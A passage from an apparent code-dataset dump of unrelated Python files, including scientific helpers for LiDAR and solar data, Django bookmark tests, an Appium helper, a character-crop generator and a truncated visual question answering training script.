cylinder)\n\nmin_x=np.min(in_pc_nparray[:,0])\nmax_x=np.max(in_pc_nparray[:,0])\nstep_x=resolution\n\nmin_y=np.min(in_pc_nparray[:,1])\nmax_y=np.max(in_pc_nparray[:,1])\nstep_y=resolution\n\nbound_x = np.arange(min_x, max_x, step_x)\nbound_y = np.arange(min_y, max_y, step_y)\n\ntarget_x, target_y = np.meshgrid(bound_x, bound_y, indexing='ij')\n\n# export as XYZ pcloud\n\nx=np.ravel(target_x)\ny=np.ravel(target_y)\nz=np.ones(len(x))\n\nfalse_intensity=np.zeros(len(x))\n\nout_LAS = File(filename+\"_target.las\", mode = \"w\", header = in_pc.header)\nout_LAS.x = x\nout_LAS.y = y\nout_LAS.z = z\nout_LAS.intensity = false_intensity\nout_LAS.close()\n\nend1 = time.time()\ndifftime1=end1 - start1\nprint((\"create target point: %f sec\") % (difftime1))\n\n# Calculate features\n\nstart1 = time.time()\nprint(\"------ Import is started ------\")\n\npc = read_las.read(filename+\".las\")\ntarget = read_las.read(filename+\"_target.las\")\nradius=resolution\n\nprint((\"Number of points: %s \") % (pc[point]['x']['data'].shape[0]))\nprint((\"Number of points in target: %s \") % (target[point]['x']['data'].shape[0]))\n\nprint(\"------ Computing neighborhood is started ------\")\n\n#compute_neighborhoods is now a generator. To get the result of a generator the user\n#needs to call next(compute_neighborhoods). The following shows how to get the results.\n#\n#indices_cyl=compute_neighborhoods(pc, target, Cell(np.float(args.radius)))\n#\nneighbors=compute_neighborhoods(pc, target, Cell(np.float(radius)))\niteration=0\ntarget_idx_base=0\nfor x in neighbors:\n print(\"Computed neighborhoods list length at iteration %d is: %d\" % (iteration,len(x)))\n\n print(\"------ Feature calculation is started ------\")\n compute_features(pc, x, target_idx_base, target, ['min_z','max_z','mean_z','median_z','perc_10','perc_30','perc_50','perc_70','perc_90','point_density','eigenv_1','eigenv_2','eigenv_3','z_entropy','std_z','var_z','skew_z','kurto_z','pulse_penetration_ratio','density_absolute_mean'], Cell(np.float(radius)))\n target_idx_base+=len(x)\n\n iteration+=1\n\n\nwrite(target,filename+str(resolution)+\"m_cell.ply\")\n\nend1 = time.time()\ndifftime1=end1 - start1\nprint((\"feature calc: %f sec\") % (difftime1))","sub_path":"Paper1/vegfeaturecalc_non_norm.py","file_name":"vegfeaturecalc_non_norm.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"393076397","text":"\nimport re\nimport model\nimport os\n\nkeras_model = None\ninput_encoding = None\ninput_decoding = None\noutput_encoding = None\noutput_decoding = None\n\ndef load_default_model():\n trained_model_dir = os.path.join(os.path.dirname(__file__), '../trained_models')\n global keras_model, input_encoding, input_decoding, output_encoding, output_decoding\n keras_model, input_encoding, input_decoding, output_encoding, output_decoding = model.load(save_dir=trained_model_dir)\n\ndef to_katakana(text):\n\n if keras_model is None:\n load_default_model()\n\n return model.to_katakana(\n text=text.lower(),\n keras_model=keras_model,\n input_encoding=input_encoding,\n output_decoding=output_decoding)","sub_path":"katakana/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"363457862","text":"\"\"\"\nHelper routines for field extrapolation routines and dealing with vector field data\n\"\"\"\nimport numpy as np\nimport astropy.time\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord\nimport yt\nimport sunpy.coordinates\nfrom sunpy.map import GenericMap, make_fitswcs_header\n\n__all__ = [\n 'synthetic_magnetogram',\n 'magnetic_field_to_yt_dataset',\n 'from_local',\n 'to_local',\n]\n\n\n@u.quantity_input\ndef synthetic_magnetogram(bottom_left_coord, top_right_coord, shape: u.pixel, centers,\n sigmas: u.arcsec, amplitudes: u.Gauss, observer=None):\n \"\"\"\n Compute synthetic magnetogram using 2D guassian \"sunspots\"\n\n Parameters\n ----------\n bottom_left_coord : `~astropy.coordinates.SkyCoord`\n Bottom left corner\n top_right_coord : `~astropy.coordinates.SkyCoord`\n Top right corner\n shape : `~astropy.units.Quantity`\n Dimensionality of the magnetogram\n centers : `~astropy.coordinates.SkyCoord`\n Center coordinates of flux concentration\n sigmas : `~astropy.units.Quantity`\n Standard deviation of flux concentration with shape `(N,2)`, with `N` the\n number of flux concentrations\n amplitudes : `~astropy.units.Quantity`\n Amplitude of flux concentration with shape `(N,)`\n observer : `~astropy.coordinates.SkyCoord`, optional\n Defaults to Earth observer at current time\n \"\"\"\n time_now = astropy.time.Time.now()\n if observer is None:\n observer = sunpy.coordinates.ephemeris.get_earth(time=time_now)\n # Transform to HPC frame\n hpc_frame = sunpy.coordinates.Helioprojective(observer=observer, obstime=observer.obstime)\n bottom_left_coord = bottom_left_coord.transform_to(hpc_frame)\n top_right_coord = top_right_coord.transform_to(hpc_frame)\n # Setup array\n delta_x = (top_right_coord.Tx - bottom_left_coord.Tx).to(u.arcsec)\n delta_y = (top_right_coord.Ty - bottom_left_coord.Ty).to(u.arcsec)\n dx = delta_x / shape[0]\n dy = delta_y / shape[1]\n data = np.zeros((int(shape[1].value), int(shape[0].value)))\n xphysical, yphysical = np.meshgrid(np.arange(shape[0].value)*shape.unit*dx,\n np.arange(shape[1].value)*shape.unit*dy)\n # Add sunspots\n centers = centers.transform_to(hpc_frame)\n for c, s, a in zip(centers, sigmas, amplitudes):\n xc_2 = (xphysical - (c.Tx - bottom_left_coord.Tx)).to(u.arcsec).value**2.0\n yc_2 = (yphysical - (c.Ty - bottom_left_coord.Ty)).to(u.arcsec).value**2.0\n data += a.to(u.Gauss).value * np.exp(\n - xc_2 / (2 * s[0].to(u.arcsec).value**2)\n - yc_2 / (2 * s[1].to(u.arcsec).value**2)\n )\n # Build metadata\n meta = make_fitswcs_header(\n data,\n bottom_left_coord,\n reference_pixel=(0, 0) * u.pixel,\n scale=u.Quantity((dx, dy)),\n instrument='synthetic_magnetic_imager',\n telescope='synthetic_magnetic_imager',\n )\n meta['bunit'] = 'gauss'\n return GenericMap(data, meta)\n\n\n@u.quantity_input\ndef magnetic_field_to_yt_dataset(Bx: u.gauss, By: u.gauss, Bz: u.gauss, range_x: u.cm,\n range_y: u.cm, range_z: u.cm):\n \"\"\"\n Reshape vector magnetic field data into a yt dataset\n\n Parameters\n ----------\n Bx,By,Bz : `~astropy.units.Quantity`\n 3D arrays holding the x,y,z components of the extrapolated field\n range_x, range_y, range_z : `~astropy.units.Quantity`\n Spatial range in the x,y,z dimensions of the grid\n \"\"\"\n Bx = Bx.to(u.gauss)\n By = By.to(u.gauss)\n Bz = Bz.to(u.gauss)\n data = dict(Bx=(np.swapaxes(Bx.value, 0, 1), Bx.unit.to_string()),\n By=(np.swapaxes(By.value, 0, 1), By.unit.to_string()),\n Bz=(np.swapaxes(Bz.value, 0, 1), Bz.unit.to_string()))\n # Uniform, rectangular grid\n bbox = np.array([range_x.to(u.cm).value,\n range_y.to(u.cm).value,\n range_z.to(u.cm).value])\n return yt.load_uniform_grid(data, data['Bx'][0].shape,\n bbox=bbox,\n length_unit=yt.units.cm,\n geometry=('cartesian', ('x', 'y', 'z')))\n\n\n@u.quantity_input\ndef from_local(x_local: u.cm, y_local: u.cm, z_local: u.cm, center):\n \"\"\"\n Transform from a Cartesian frame centered on the active region (with the z-axis parallel\n to the surface normal).\n\n Parameters\n ----------\n x_local : `~astropy.units.Quantity`\n y_local : `~astropy.units.Quantity`\n z_local : `~astropy.units.Quantity`\n center : `~astropy.coordinates.SkyCoord`\n Center of the active region\n\n Returns\n -------\n coord : `~astropy.coordinates.SkyCoord`\n \"\"\"\n center = center.transform_to(sunpy.coordinates.frames.HeliographicStonyhurst)\n x_center, y_center, z_center = center.cartesian.xyz\n rot_zy = rotate_z(center.lon) @ rotate_y(-center.lat)\n # NOTE: the coordinates are permuted because the local z-axis is parallel to the surface normal\n coord_heeq = rot_zy @ u.Quantity([z_local, x_local, y_local])\n\n return SkyCoord(x=coord_heeq[0, :] + x_center,\n y=coord_heeq[1, :] + y_center,\n z=coord_heeq[2, :] + z_center,\n frame=sunpy.coordinates.HeliographicStonyhurst,\n representation_type='cartesian')\n\n\n@u.quantity_input\ndef to_local(coord, center):\n \"\"\"\n Transform coordinate to a cartesian frame centered on the active region\n (with the z-axis normal to the surface).\n\n Parameters\n ----------\n coord : `~astropy.coordinates.SkyCoord`\n center : `~astropy.coordinates.SkyCoord`\n Center of the active region\n \"\"\"\n center = center.transform_to(sunpy.coordinates.HeliographicStonyhurst)\n x_center, y_center, z_center = center.cartesian.xyz\n xyz_heeq = coord.transform_to(sunpy.coordinates.HeliographicStonyhurst).cartesian.xyz\n if xyz_heeq.shape == (3,):\n xyz_heeq = xyz_heeq[:, np.newaxis]\n x_heeq = xyz_heeq[0, :] - x_center\n y_heeq = xyz_heeq[1, :] - y_center\n z_heeq = xyz_heeq[2, :] - z_center\n rot_yz = rotate_y(center.lat) @ rotate_z(-center.lon)\n coord_local = rot_yz @ u.Quantity([x_heeq, y_heeq, z_heeq])\n # NOTE: the coordinates are permuted because the local z-axis is parallel to the surface normal\n return coord_local[1, :], coord_local[2, :], coord_local[0, :]\n\n\n@u.quantity_input\ndef rotate_z(angle: u.radian):\n angle = angle.to(u.radian)\n return np.array([[np.cos(angle), -np.sin(angle), 0],\n [np.sin(angle), np.cos(angle), 0],\n [0, 0, 1]])\n\n\n@u.quantity_input\ndef rotate_y(angle: u.radian):\n angle = angle.to(u.radian)\n return np.array([[np.cos(angle), 0, np.sin(angle)],\n [0, 1, 0],\n [-np.sin(angle), 0, np.cos(angle)]])\n","sub_path":"synthesizAR/extrapolate/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"600724819","text":"import json\r\nimport dml\r\nimport prov.model\r\nimport datetime\r\nimport uuid\r\nimport bson.code\r\nimport pymongo\r\n\r\nclass RestaurantRatingsAndInspections_Boston(dml.Algorithm):\r\n\r\n contributor = \"bstc_semina\"\r\n reads = []\r\n writes = ['bstc_semina.RestaurantRatingsAndInspections_Boston']\r\n\r\n @staticmethod\r\n def execute(trial = False):\r\n startTime = datetime.datetime.now()\r\n new_collection_name = 'RestaurantRatingsAndInspections_Boston'\r\n\r\n client = dml.pymongo.MongoClient()\r\n repo = client.repo\r\n repo.authenticate('bstc_semina', 'bstc_semina')\r\n\r\n repo.dropCollection('bstc_semina.'+new_collection_name)\r\n repo.createCollection('bstc_semina.'+new_collection_name)\r\n\r\n collection_yelp = repo.bstc_semina.getBostonYelpRestaurantData\r\n cursor_yelp = collection_yelp.find({})\r\n collection_inspections = repo.bstc_semina.getBostonRestaurantLicenseData\r\n cursor_inspections = collection_inspections.find({})\r\n\r\n mapperInspections = bson.code.Code(\"\"\"\r\n function() {\r\n var vs = {\r\n violation_level: this.ViolLevel,\r\n num_violations: 1\r\n };\r\n emit(this.businessName, vs);\r\n }\r\n \"\"\")\r\n reducer = bson.code.Code(\"\"\"\r\n function(k, vs) {\r\n var total = 0;\r\n var num_violations = 0;\r\n\r\n for (var i = 0; i < vs.length; i++) {\r\n //total += vs[i].violation_level.length;\r\n num_violations += 5; // for some reason this isn't working, reducer doesn't seem to be called.\r\n }\r\n return {num_violations: num_violations, total_violation_severity: total};\r\n }\r\n \"\"\")\r\n finalizer = bson.code.Code(\"\"\"\r\n function(k, reduced_v) {\r\n reduced_v.ave_violation_severity = reduced_v.num_violations;\r\n return reduced_v;\r\n }\r\n \"\"\")\r\n\r\n repo.bstc_semina.getBostonRestaurantLicenseData.map_reduce(mapperInspections, reducer, 'bstc_semina.'+new_collection_name, finalize = finalizer)\r\n\r\n # # merge on restaurant name\r\n # mapperYelp = bson.code.Code(\"\"\"\r\n # function() {\r\n # var vs = {\r\n # ratings: this.ratings,\r\n # review_count: this.review_count,\r\n # categories: this.categories,\r\n # location: this.location,\r\n # coordinates: this.coordinates\r\n # };\r\n # emit(this.businesses[0].name, vs)\r\n # }\r\n # \"\"\")\r\n # mapperInspections = bson.code.Code(\"\"\"\r\n # function() {\r\n # var vs = {\r\n # violation_level: this.ave_violation,\r\n #\r\n # };\r\n # }\r\n # \"\"\")\r\n\r\n repo.logout()\r\n\r\n endTime = datetime.datetime.now()\r\n\r\n return ({'start':startTime, 'end':endTime})\r\n\r\n def provenance(doc = prov.model.ProvDocument(), startTime = None, endTime = None):\r\n '''\r\n Create the provenance document describing everything happening\r\n in this script. Each run of the script will generate a new\r\n document describing that invocation event.\r\n '''\r\n\r\n # Set up the database connection.\r\n client = dml.pymongo.MongoClient()\r\n repo = client.repo\r\n repo.authenticate('alice_bob', 'alice_bob')\r\n doc.add_namespace('alg', 'http://datamechanics.io/algorithm/') # The scripts are in # format.\r\n doc.add_namespace('dat', 'http://datamechanics.io/data/') # The data sets are in # format.\r\n doc.add_namespace('ont', 'http://datamechanics.io/ontology#') # 'Extension', 'DataResource', 'DataSet', 'Retrieval', 'Query', or 'Computation'.\r\n doc.add_namespace('log', 'http://datamechanics.io/log/') # The event log.\r\n doc.add_namespace('bdp', 'https://data.cityofboston.gov/resource/')\r\n\r\n this_script = doc.agent('alg:alice_bob#example', {prov.model.PROV_TYPE:prov.model.PROV['SoftwareAgent'], 'ont:Extension':'py'})\r\n resource = doc.entity('bdp:wc8w-nujj', {'prov:label':'311, Service Requests', prov.model.PROV_TYPE:'ont:DataResource', 'ont:Extension':'json'})\r\n get_found = doc.activity('log:uuid'+str(uuid.uuid4()), startTime, endTime)\r\n get_lost = doc.activity('log:uuid'+str(uuid.uuid4()), startTime, endTime)\r\n doc.wasAssociatedWith(get_found, this_script)\r\n doc.wasAssociatedWith(get_lost, this_script)\r\n doc.usage(get_found, resource, startTime, None,\r\n {prov.model.PROV_TYPE:'ont:Retrieval',\r\n 'ont:Query':'?type=Animal+Found&$select=type,latitude,longitude,OPEN_DT'\r\n }\r\n )\r\n doc.usage(get_lost, resource, startTime, None,\r\n {prov.model.PROV_TYPE:'ont:Retrieval',\r\n 'ont:Query':'?type=Animal+Lost&$select=type,latitude,longitude,OPEN_DT'\r\n }\r\n )\r\n\r\n lost = doc.entity('dat:alice_bob#lost', {prov.model.PROV_LABEL:'Animals Lost', prov.model.PROV_TYPE:'ont:DataSet'})\r\n doc.wasAttributedTo(lost, this_script)\r\n doc.wasGeneratedBy(lost, get_lost, endTime)\r\n doc.wasDerivedFrom(lost, resource, get_lost, get_lost, get_lost)\r\n\r\n found = doc.entity('dat:alice_bob#found', {prov.model.PROV_LABEL:'Animals Found', prov.model.PROV_TYPE:'ont:DataSet'})\r\n doc.wasAttributedTo(found, this_script)\r\n doc.wasGeneratedBy(found, get_found, endTime)\r\n doc.wasDerivedFrom(found, resource, get_found, get_found, get_found)\r\n\r\n repo.logout()\r\n\r\n return doc\r\n\r\nRestaurantRatingsAndInspections_Boston.execute()\r\n","sub_path":"bstc_csuksan_semina_tedkong/Project1/RestaurantRatingsAndInspections_Boston_mapreduce.py","file_name":"RestaurantRatingsAndInspections_Boston_mapreduce.py","file_ext":"py","file_size_in_byte":5907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"305174564","text":"\n\nfrom xai.brain.wordbase.nouns._bazooka import _BAZOOKA\n\n#calss header\nclass _BAZOOKAS(_BAZOOKA, ):\n\tdef __init__(self,): \n\t\t_BAZOOKA.__init__(self)\n\t\tself.name = \"BAZOOKAS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"bazooka\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_bazookas.py","file_name":"_bazookas.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"43560331","text":"import yaml\r\nfrom appium.webdriver.common.mobileby import MobileBy\r\n\r\n\r\ndef handle_black(fun):\r\n def run(*args, **kwargs):\r\n # black_list = [(MobileBy.XPATH, \"//*[@resource-id='com.xueqiu.android:id/iv_close']\")]\r\n # 从yaml文件中读取black list\r\n with open(\"../black_list.yaml\", \"r\", encoding=\"utf-8\") as f:\r\n black_list = yaml.safe_load(f)\r\n param_1 = args[0]\r\n param_2 = args[1]\r\n try:\r\n return fun(*args, **kwargs)\r\n except Exception as e:\r\n # 循环遍历黑名单列表,如果存在,那么对黑名单元素进行处理:点击关闭弹窗\r\n for black in black_list:\r\n eles = param_1.driver.find_elements(*black)\r\n if len(eles) > 0:\r\n eles[0].click()\r\n # 处理黑名单后再次查找\r\n # return self.find(locator)\r\n # return fun(*args, **kwargs)\r\n return param_1.find(param_2)\r\n raise e\r\n return run\r\n","sub_path":"homework/test_frame_second/handle_black.py","file_name":"handle_black.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"35355288","text":"import json\r\nfrom django.urls import reverse\r\nfrom rest_framework.views import status\r\nfrom rest_framework.test import APITestCase, APIClient\r\n\r\n\r\nclass TestBookmarks(APITestCase):\r\n def setUp(self):\r\n self.client = APIClient()\r\n self.signup_url = reverse('authentication:auth-register')\r\n self.article_url = reverse('articles:articles-listcreate')\r\n self.get_bookmark_url = reverse('bookmarks:bookmarks')\r\n self.edit_bookmark_url = reverse(\r\n 'bookmarks:edit-bookmark',\r\n kwargs={'slug': 'tdd'})\r\n self.signup_data = {\r\n \"user\": {\r\n \"username\": \"johndoe\",\r\n \"email\": \"johndoe@gmail.com\",\r\n \"password\": \"Kennyisme1!\"\r\n }}\r\n self.create_article_data = {\r\n \"title\": \"TDD\",\r\n \"body\": \"This is my story\",\r\n \"description\": \"Here is my story\",\r\n \"tagList\": [\"dragons\", \"training\"]\r\n }\r\n\r\n def signup_user(self):\r\n \"\"\"Function to register user one and return their token\"\"\"\r\n register = self.client.post(self.signup_url,\r\n self.signup_data,\r\n format='json')\r\n token = json.loads(register.content)['user']['token']\r\n return token\r\n\r\n def create_article(self, article, token):\r\n response = self.client.post(\r\n self.article_url,\r\n article,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token))\r\n return response\r\n\r\n def test_bookmark_invalid_article(self):\r\n \"\"\"Test getting an invalid article\"\"\"\r\n token = self.signup_user()\r\n response = self.client.post(\r\n self.edit_bookmark_url,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token))\r\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\r\n self.assertEqual(\r\n json.loads(response.content),\r\n {'error': 'Article tdd does not exist'})\r\n\r\n def test_bookmarking_an_article(self):\r\n \"\"\"Test bookmarking an article\"\"\"\r\n token = self.signup_user()\r\n self.create_article(self.create_article_data, token)\r\n response = self.client.post(\r\n self.edit_bookmark_url,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token))\r\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\r\n self.assertEqual(\r\n json.loads(response.content),\r\n {'message': 'Article has been added to your bookmark'})\r\n\r\n def test_get_all_bookmarks(self):\r\n \"\"\"Test getting all bookmarks\"\"\"\r\n token = self.signup_user()\r\n self.create_article(self.create_article_data, token)\r\n self.client.post(\r\n self.edit_bookmark_url,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token))\r\n\r\n response = self.client.get(\r\n self.get_bookmark_url,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token)\r\n )\r\n self.assertEqual(response.status_code, status.HTTP_200_OK)\r\n self.assertIn('my_bookmarks', json.loads(response.content))\r\n\r\n def test_get_no_bookmarks(self):\r\n \"\"\"Test getting zero bookmarks \"\"\"\r\n token = self.signup_user()\r\n self.create_article(self.create_article_data, token)\r\n response = self.client.get(\r\n self.get_bookmark_url,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token)\r\n )\r\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\r\n self.assertEqual(\r\n json.loads(response.content),\r\n {'my_bookmarks': []})\r\n\r\n def test_delete_bookmarks(self):\r\n \"\"\"test deleting bookmarks\"\"\"\r\n token = self.signup_user()\r\n self.create_article(self.create_article_data, token)\r\n self.client.post(\r\n self.edit_bookmark_url,\r\n format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token))\r\n\r\n response = self.client.delete(\r\n self.edit_bookmark_url, format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token)\r\n )\r\n self.assertEqual(response.status_code, status.HTTP_200_OK)\r\n self.assertEqual(\r\n json.loads(response.content),\r\n {'message': 'Article has been remove from your bookmark'})\r\n\r\n def test_delete_none_existing_bookmarks(self):\r\n \"\"\"Test deleting bookmarks that does not exist\"\"\"\r\n token = self.signup_user()\r\n self.create_article(self.create_article_data, token)\r\n response = self.client.delete(\r\n self.edit_bookmark_url, format='json',\r\n HTTP_AUTHORIZATION='token {}'.format(token)\r\n )\r\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\r\n self.assertEqual(\r\n json.loads(response.content),\r\n {'error': 'Article does not exist in your bookmark'})\r\n\r\n def test_posting_with_logged_in_user(self):\r\n \"\"\"Test bookmarking an article when not logged in\"\"\"\r\n token = self.signup_user()\r\n self.create_article(self.create_article_data, token)\r\n response = self.client.post(\r\n self.edit_bookmark_url,\r\n format='json')\r\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\r\n self.assertEqual(\r\n json.loads(response.content),\r\n {'detail': 'Authentication credentials were not provided.'})\r\n","sub_path":"authors/apps/bookmark/tests/test_bookmarks.py","file_name":"test_bookmarks.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"637052165","text":"from collections import defaultdict\nimport sys\ndef read():\n\treturn sys.stdin.readline()\n\ndef solve():\n\tn,m = map(int,read().split())\n\ta = list(map(int,read().split()))\n\tb = []\n\tres = defaultdict(int)\n\tfor i in range(n):\n\t\tres[a[i]]+=1\n\tprev = len(list(res.values()))\n\tres[a[0]]-=1\n\tans = [0]\n\tans.append(prev)\n\tfor i in range(1,n):\n\t\tif res[a[i-1]]==0:\n\t\t\tprev-=1\n\t\tres[a[i]]-=1\n\t\tans.append(prev)\n\tfor i in range(m):\n\t\ttemp = int(read())\n\t\tprint(ans[temp])\n\t\n\nif __name__ == '__main__':\n\tsolve()\n","sub_path":"Codeforces/Python/Sereja and Suffixes.py","file_name":"Sereja and Suffixes.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"123090190","text":"from django.conf.urls import url\n\n# Our own modules\nfrom news import views\n\n\"\"\"\nnews.urls module\n\nThis module contains the URL patterns that map an URL to a function in\nour view module.\n\nWhen an URL matches a pattern the function that is specified after the pattern\nis called.\n\nIf the pattern contains regex with a capture group the captured content is sent\nto the function as a named parameter (for instance on the post pattern, post_id\nwill capture the element between news and the last / and sending that to the\nviews.item function,\n\"\"\"\n\nurlpatterns = [\n # Matches http://example.com/news\n url(r'^$', views.index, name='news'),\n\n # Matches http://example.com/nyheter/2015\n url(r'^(?P[0-9]{4})/$', views.index_from_year, name=\"index_by_year\"),\n\n # Matches http://example.com/nyheter/2015/08/18\n url(r'^(?P[0-9]{4})/(?P[0-9]{2})/$', views.index_from_date, name=\"index_by_date\"),\n\n # Matches http://example.com/nyheter/id/4\n url(r'^id/(?P\\d+)/$', views.item, name=\"post\"),\n\n # Matches http://example.com/nyheter/senaste\n url(r'^senaste/$', views.latest, name=\"latest\"),\n\n # Matches http://example.com/nyheter/feed.rss\n url(r'^rss.xml$', views.rss, name=\"rss\")\n]\n","sub_path":"news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"588314064","text":"import xml.etree.ElementTree as ET\nimport os\nimport csv\nfrom PIL import Image\nimport string\n\nCLASSES = string.digits + string.ascii_uppercase + string.ascii_lowercase\nrootdir='English'\ndataset_dir='kaist'\n\nif not os.path.isdir(dataset_dir):\n os.makedirs(dataset_dir)\n print(dataset_dir, 'genearted')\n\nimg_idx=0\nimg_names=[]\nimg_labels=[]\nfor subdir, dirs, files in os.walk(rootdir):\n for file in files:\n filepath = subdir + os.sep + file\n if filepath.endswith(\".xml\"):\n filename, file_extension = os.path.splitext(filepath)\n # print(filepath)\n try:\n tree = ET.parse(filepath)\n root = tree.getroot()\n except:\n\n print('xml error',filepath)\n continue\n\n for character in root.iter('character'):\n x=int(character.get('x'))\n y = int(character.get('y'))\n w = int(character.get('width'))\n h = int(character.get('height'))\n ch = character.get('char')\n if ch not in CLASSES:\n continue\n try:\n img = Image.open(filename+\".jpg\")\n except:\n img = Image.open(filename + \".JPG\")\n img.crop((x,y,x+w,y+h)).save(dataset_dir+'/img%d.png'%img_idx)\n img_names.append('img%d.png'%img_idx)\n img_idx+=1\n img_labels.append(ch)\n\n\n\nwith open( dataset_dir+'/'+dataset_dir+'.csv', 'w') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerows(list(zip(img_names,img_labels)))\n print(dataset_dir+'/'+dataset_dir+'.csv','saved')","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"633366535","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# This is question answering model focusing on\n# dataset whose category is 'yes/no' question\n# such that it is binary classification\n#\n# This is written for running on NVIDIA Jetson so that\n# it will be not for tensorflow 2.0 but for 1.14\n# which is the latest version supported by NVIDIA\n\nimport os\nimport random\nimport time\nfrom functools import partial\nimport json\nimport warnings\n\n# ignore tensorflow debug info\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n# ignore numpy futre warnigns\nwarnings.filterwarnings('ignore')\n\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.python.keras.backend import set_session\n\nfrom keras_preprocessing import image\n\nfrom main.settings import Config\nfrom main.models import SequenceGeneratorModel, QuestionImageEncoder\nfrom main.models.train import make_training_seq_model\nfrom main.utils.preprocess import text_processor\n\nif tf.__version__ < '2.0.0':\n from main.metrics import calculate_accuracy_np as calculate_accuracy\n from main.utils.loader import load_image_simple as load_image\nelse:\n from main.metrics import calculate_accuracy\n from main.utils.loader import load_image\n\n\n# paramaters\nDEBUG = False\n\n# Train\nvocab_size = 20000\ndata_size = 100000\nseq_length = 15\nans_length = 5 + 2 # maximum answer length + '' and ''\n\nembedding_dim = 256\nunits = 512\n\nlearning_rate = 0.001\n\nbatch_size = 128\nepochs = 10\ndisplay_step = 1000\n\n# make easy to calculate accuracy and loss by average\nstep_per_val = 100\nval_size = batch_size * step_per_val\n\n\ndef data_generator(dataset, batch_size):\n steps_per_epoch = len(dataset) // batch_size\n\n for step in range(steps_per_epoch):\n start = step * batch_size\n batch = dataset[start:start+batch_size]\n qs, answers, imgs = data_process(batch)\n\n yield (qs, imgs), answers\n\n\n# Load data predprocessed\n# Format:\n# a list of dict:\n# keys = {'question', 'questionType', 'answer', 'answerType', 'image_path'}\ndef data_process(dataset):\n global processor\n global ans_processor\n\n qs = [d['question'] for d in dataset]\n qs = processor(qs)\n\n answers = [' ' + d['answer'] + ' ' for d in dataset]\n answers = ans_processor(answers)\n\n imgs = np.array([np.load(d['image_path'], allow_pickle=True)\n for d in dataset])\n return qs, answers, imgs\n\n\ndef main(train, val, *, save=False):\n if save:\n # threshold to save model weights\n min_loss = 50.0\n base_path = Config.MODELS.get('WHAT')\n enc_weights_path = os.path.join(base_path, 'encoder', 'weights')\n gen_weights_path = os.path.join(base_path, 'gen', 'weights')\n\n encoder = QuestionImageEncoder(units, vocab_size, embedding_dim)\n model = SequenceGeneratorModel(units,\n vocab_size,\n embedding_dim,\n encoder.embedding)\n\n optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n\n train_seq_step = make_training_seq_model(\n model,\n ans_length,\n optimizer,\n encoder_model=encoder,\n loss='sparse_categorical_crossentropy'\n )\n\n\n for epoch in range(1, epochs+1):\n epoch_start = time.time()\n print('=====' * 10)\n print(' Epochs:', epoch)\n print('=====' * 10)\n\n batch_start = time.time()\n\n random.shuffle(train)\n\n for batch, (inputs, labels) \\\n in enumerate(data_generator(train, batch_size=batch_size)):\n st = time.time()\n\n # ============================\n # Run model\n # ============================\n x = np.array([processor.word_index['']] * len(labels))\n loss, pred, attention_weights = train_seq_step(x, inputs, labels)\n\n if batch % display_step == 0:\n if DEBUG:\n print('[DEBUG] Batch:', batch)\n #print('[DEBUG] Average weights:')\n #for layer in model.layers:\n # print('Layer:', model.name + ':' + layer.name)\n # print(' weights:')\n # print(' mean:', np.mean(layer.get_weights()[0]))\n # print(' std: ', np.std(layer.get_weights()[0]))\n print('[DEBUG] Predicted Sentence:')\n print(' Input:', inputs[0][0])\n print(labels[0])\n print(' Label: {}'.format(\n ' '.join(ans_processor.index_word[idx]\n for idx in labels[0] if idx > 0)))\n # prediction does not have \n print(' Pred: {}'.format(\n ' ' + ' '.join(ans_processor.index_word[idx]\n for idx in pred[0] if idx > 0)))\n\n # general output\n curr_time = time.time()\n print(' Batch -', batch)\n print(f' Train: Loss - {loss:.4f} '\n f'Time(calc) - {curr_time-st:.4f}s/batch '\n f'Time(total) - {curr_time-batch_start:.4f}s/batch')\n\n batch_start = time.time()\n\n # after finished training in each epoch\n # evaluate model by validation dataset\n st_val = time.time()\n\n loss_val = 0\n predicts = []\n\n for in_val, l_val in data_generator(val, batch_size=batch_size):\n features, _ = 